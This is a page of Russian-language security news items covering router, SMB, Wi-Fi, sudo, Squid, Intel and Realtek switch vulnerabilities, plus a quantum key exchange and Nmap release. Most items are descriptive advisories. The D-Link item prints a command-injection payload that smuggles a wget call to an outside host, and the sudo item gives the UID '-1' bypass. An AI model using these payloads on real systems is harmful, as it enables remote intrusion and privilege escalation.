Разделы сайта Все
#безопасность
Команда исследователей из Китая, Сингапура и Великобритании смогла с помощью спутника «Мо-Цзы» объединить города Наньшань и Дэлинха самой длинной квантовой линией связи, защищенной от взлома.

«Нам удалось осуществить квантовый обмен ключами между двумя наземными станциями на расстоянии 1120 км. Мы повысили эффективность передачи запутанных фотонов примерно в четыре раза и достигли скорости в 0,12 бит в секунду», – пояснили эксперты.

Некоторые проблемы современных систем квантовой связи связаны с тем, что свет при движении через оптоволокно постепенно ослабевает, и в связи с этим расстояние между узлами квантовых сетей в настоящее время составляет всего несколько сотен километров.

Данную проблему исследователи пытаются решить двумя способами: с помощью так называемых повторителей квантовых сигналов, которые могут считывать поступающие в них квантовые сигналы, усиливать их и отправлять адресату, не нарушая целостности данных, или путем повышения дальности передачи квантовой информации через спутники связи.
В http-сервере, применяемом в SOHO-маршрутизаторах Netgear, выявлена уязвимость, позволяющая без прохождения аутентификации удалённо выполнить свой код с правами root и получить полный контроль за устройством. Для атаки достаточно возможности отправки запроса на сетевой порт, на которым выполняется web-интерфейс. Проблема вызвана отсутствием проверки размера внешних данных, перед их копированием в буфер фиксированного размера. Уязвимость подтверждена в различных моделях маршрутизаторов Netgear, в прошивках которых используется типовой уязвимый процесс httpd.
Уязвимость затрагивает версии Windows 10 1903 и 1909.

Исследователи кибербезопасности из компании ZecOps обнаружили новую критическую уязвимость ( CVE-2020-1206 ) в сетевом протоколе передачи данных Microsoft Server Message Block (SMB). Ее эксплуатация позволяет злоумышленникам удаленно получить из памяти ядра конфиденциальные данные, а в сочетании с ранее обнаруженной «червеобразной» уязвимостью SMBGhost в Windows 10 ( CVE-2020-0796 ) проблема может быть использована для удаленного выполнения кода.

Проблема, получившая название SMBleed, затрагивает версии Windows 10 1903 и 1909. По словам экспертов, она связана с тем, что функция распаковки («Srv2DecompressData») в SMB-протоколе способна обрабатывать специально сформированные запросы сообщений (например, SMB2 WRITE), отправленные на целевой сервер SMBv3. Таким образом злоумышленник может читать данные в памяти ядра и вносить изменения в функцию сжатия.
Атака Spectra базируется на механизме, используемом чипами для переключения между беспроводными технологиями.

Группа немецких и итальянских ученых разработали новую атаку, позволяющую обойти разделение между технологиями Wi-Fi и Bluetooth, используемыми на одном устройстве (смартфоне, ноутбуках и планшетах). Атака, получившая название Spectra, работает на «комбинированных» чипах, обрабатывающих различные виды беспроводной связи, в том числе Wi-Fi, Bluetooth, LTE и пр.

«Новый класс уязвимостей Spectra базируется на том факте, что передача данных происходит в одном спектре, и беспроводные чипы должны разрешать доступ к каналу», - сообщили исследователи в коротком анонсе своего будущего доклада на конференции Black Hat.

Если говорить точнее, Spectra базируется на механизме сосуществования, используемом «комбинированными» чипами для быстрого переключения между беспроводными технологиями. По словам исследователей, хотя эти механизмы повышают производительность, они также делают устройство уязвимым к атакам по сторонним каналам.
Эксплуатация проблем позволяет вводить команды в httpd.log, получать права доступа или токены сеансов J-Web.

Производитель телекоммуникационного оборудования для интернет-провайдеров, корпораций и государственного сектора Juniper Networks выпустил внеплановое обновление безопасности для операционной системы Junos OS, исправляющее несколько проблем в web-сервисах и интерфейсе J-Web, объединенных под одним идентификатором CVE (CVE-2020-1631). Эксплуатация проблем позволяет злоумышленнику вводить команды в httpd.log, читать файлы с разрешением на чтение «world» или получать токены сеансов J-Web.

Как сообщила компания, наиболее опасной является проблема, связаннная с токеном сеанса J-Web, получившая оценку в 8,8 балла по шкале CVSS. Если J-Web включен на устройстве, злоумышленник может получить тот же уровень доступа, что и любой авторизованный пользователь (например, права администратора).

Другая проблема затрагивает версии Junos OS 19.3R1 и старше, ее эксплуатация позволяет неавторизованному злоумышленнику прочитать файл конфигурации.

Эксплуатация третьей проблемы позволяет злоумышленнику вводить команды в httpd.log. Однако влияние данной проблемы более ограничено, поскольку служба HTTP имеет права как у пользователя «nobody».

Уязвимость не затрагивает устройства под управлением Junos OS с отключенными сервисами HTTP/HTTPS, но содержится в следующих версиях ОС: 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, и 20.1. Сетевым администраторам рекомендуется обновить уязвимые устройства до последних версий программного обеспечения.
Раскрыты сведения об уязвимостях в прокси-сервере Squid, которые без лишней огласки были устранены ещё в прошлом году в выпуске Squid 4.8. Проблемы присутствуют в коде обработки блока "@" в начале URL ("user@host") и позволяют обойти правила ограничения доступа, отравить содержимое кэша и совершать атаку с использованием межсайтового скриптинга.

CVE-2019-12524 - клиент при помощи специально оформленного URL может обойти правила, заданные при помощи директивы url_regex, и получить конфиденциальные сведения о прокси и обрабатываемом трафике (получить доступ к интерфейсу Cache Manager).

CVE-2019-12520 - через манипуляцию с данными об имени пользователя в URL можно добиться сохранения в кэше фиктивного содержимого для определённой страницы, что например, может использоваться для организации выполнения своего JavaScript-кода в контексте других сайтов.
Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt.

Специалист компании ForAllSecure Гвидо Вранкен (Guido Vranken) опубликовал подробности о ранее обнаруженной им критической уязвимости в OpenWrt.

Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt из-за механизма проверки целостности загруженных пакетов с помощью контрольных сумм SHA-256, встроенных в индекс репозитория.

В процессе выполнения команды opkg install на системе жертвы злоумышленник может осуществить атаку «человек посередине». Атакующий может перехватывать передаваемые данные с целью удаленного выполнения произвольного кода, обманом заставив систему установить вредоносный пакет или вредоносное обновление ПО без соответствующей проверки.
Компания Intel поблагодарила экспертов Positive Technologies, обнаруживших уязвимость в подсистеме Intel CSME . Ошибка присутствует в большинстве чипсетов Intel, выпущенных за последние пять лет.

Эксплуатируя уязвимость CVE-2019-0090, локальный злоумышленник может извлечь корневой ключ платформы (chipset key), который записан в микросхеме PСH, и получить доступ к зашифрованным этим ключом данным. При этом невозможно зафиксировать сам факт утечки ключа. Имея корневой ключ, злоумышленник может не только расшифровывать данные, хранящиеся на целевом компьютере, но и подделать его аттестацию, которая основана на схеме EPID (Enhanced Privacy ID), — то есть выдать свой компьютер за ПК жертвы. Данная схема используется в работе технологии DRM, а также для обеспечения безопасности банковских транзакций и аттестации интернета вещей.
Риску атак подвержены продукты Amazon, Apple, Google, Samsung, Raspberry, Xiaomi, а также точки доступа от Asus и Huawei.

Исследователи безопасности из компании ESET обнаружили опасную уязвимость (CVE-2019-15126) в широко используемых Wi-Fi-чипах от Broadcom и Cypress. Проблема затрагивает более миллиарда устройств, включая смартфоны, планшеты, ноутбуки, маршрутизаторы и IoT-устройства. Уязвимость получила название Kr00k и ее эксплуатация позволяет находящимся поблизости удаленным злоумышленникам перехватывать и дешифровать некоторые беспроводные сетевые пакеты, передаваемые уязвимым устройством.

Уязвимость затрагивает устройства, использующие протоколы WPA2-Personal или WPA2-Enterprise с алгоритмом шифрования AES-CCMP, но не устройства, использующие протокол WPA3. Для осуществления атаки не требуется подключение к беспроводной сети. По словам специалистов, риску атак подвержены продукты Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), а также точки доступа от Asus и Huawei.
Компания Intel исправила 13 уязвимостей в прошивке своих контроллеров управления материнской платой (BMC), используемых в продуктах Intel Server. 12 из них были выявлены специалистами Intel во время внутренних тестирований. Еще одну (CVE-2019-11171) обнаружил исследователь безопасности Даниэль Медина Веласкес (Daniel Medina Velazquez).

На данный момент об уязвимостях известно очень мало. Как сообщает производитель, CVE-2019-11171, описанная как «уязвимость повреждения» кучи, является очень опасной (9 из 10 баллов по шкале оценивания опасности уязвимостей) и позволяет неавторизованному злоумышленнику раскрыть информацию, повысить свои привилегии и/или вызвать отказ в обслуживании.

В общей сложности 13 уязвимостей затрагивают десятки моделей в каждой линейке Server Board, Compute Module и Server System. Во избежание их эксплуатации злоумышленниками настоятельно рекомендуется обновить прошивку BMC-контроллеров до версии 2.18 или более поздних.
В утилите Sudo, используемой для организации выполнения команд от имени других пользователей, выявлена уязвимость (CVE-2019-14287), которая позволяет добиться выполнения команд с правами root, при наличии в настройках sudoers правил, в которых в секции проверки идентификатора пользователя после разрешающего ключевого слова "ALL" следует явный запрет запуска с правами root ("... (ALL, !root) ..."). В конфигурациях по умолчанию в дистрибутивах уязвимость не проявляется.

При наличии в sudoers допустимых, но крайне редко встречающихся на практике правил, разрешающих выполнение определённой команды под UID-идентификатором любого пользователя, кроме root, атакующий, имеющий полномочия выполнения данной команды, может обойти установленное ограничение и выполнить команду с правами root. Для обхода ограничения достаточно попытаться выполнить указанною в настройках команду с UID "-1" или "4294967295", что приведёт к её выполнению с UID 0.
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)
Спустя почти полтора года с момента прошлого выпуска представлен релиз сканера сетевой безопасности Nmap 7.80, предназначенного для проведения аудита сети и выявления активных сетевых сервисов. В состав включено 11 новых NSE-скриптов для обеспечения автоматизации различных действий с Nmap. Обновлены базы сигнатур для определения сетевых приложений и операционных систем.

Последнее время основная работа была сосредоточена на усовершенствовании и стабилизации библиотеки Npcap, развиваемой для платформы Windows в качестве замены WinPcap и использующей современный Windows API для организации захвата пакетов. Много мелких улучшений внесено в движок Nmap Scripting Engine (NSE) и связанные с ним библиотеки. В Nsock и Ncat добавлена поддержка сокетов с адресацией AF_VSOCK, работающих поверх virtio и используемых для взаимодействия между виртуальными машинами и гипервизором. Реализовано определение сервиса adb (Android Debug Bridge), включенного по умолчанию на многих мобильных устройствах.
В коммутаторах на базе чипов RTL83xx, включая Cisco Small Business 220, Zyxel GS1900-24, NETGEAR GS75x, ALLNET ALL-SG8208M и ещё более десятка устройств от менее известных производителей, выявлены критические уязвимости, позволяющие неаутентифицированному атакующему получить контроль над коммутатором. Проблемы вызваны ошибками в SDK Realtek Managed Switch Controller, код из которого использовался при подготовке прошивок.

Первая уязвимость (CVE-2019-1913) затрагивает управляющий web-интерфейс и даёт возможность выполнить свой код с привилегиями пользователя root. Уязвимость вызвана недостаточной проверкой передаваемых пользователем параметров и отсутствием должной оценки границ буфера при чтении входных данных. В результате, атакующий может вызвать переполнение буфера через отправку специально оформленного запроса и эксплуатировать проблему для выполнения своего кода.

Вторая уязвимость (CVE-2019-1912) позволяет без аутентификации загрузить произвольные файлы на коммутатор, в том числе перезаписать файлы с конфигурацией и организовать запуск обратного shell для удалённого входа. Проблема вызвана неполной проверкой полномочий в web-интерфейсе.

Также можно отметить устранение менее опасной уязвимости (CVE-2019-1914), которая позволяет при наличии непривилегированного аутентифицированного входа в web-интерфейс выполнить произвольные команды с привилегиями root. Проблемы устранены в обновлениях прошивок Cisco Small Business 220 (1.1.4.4), Zyxel и NETGEAR. Детальное описание методов эксплуатации планируется опубликовать 20 августа.

Проблемы также проявляются в других устройствах на чипах RTL83xx, но они пока не подтверждены производителями и не исправлены:
  • EnGenius EGS2110P, EWS1200-28TFP, EWS1200-28TFP;
  • PLANET GS-4210-8P2S, GS-4210-24T2;
  • DrayTek VigorSwitch P1100;
  • CERIO CS-2424G-24P;
  • Xhome DownLoop-G24M;
  • Abaniact (INABA) AML2-PS16-17GP L2;
  • Araknis Networks (SnapAV) AN-310-SW-16-POE;
  • EDIMAX GS-5424PLC, GS-5424PLC;
  • Open Mesh OMS24;
  • Pakedgedevice SX-8P;
  • TG-NET P3026M-24POE.
Как завладеть миром, не вызывая подозрения у санитаров. Спасайте ваши лестницы.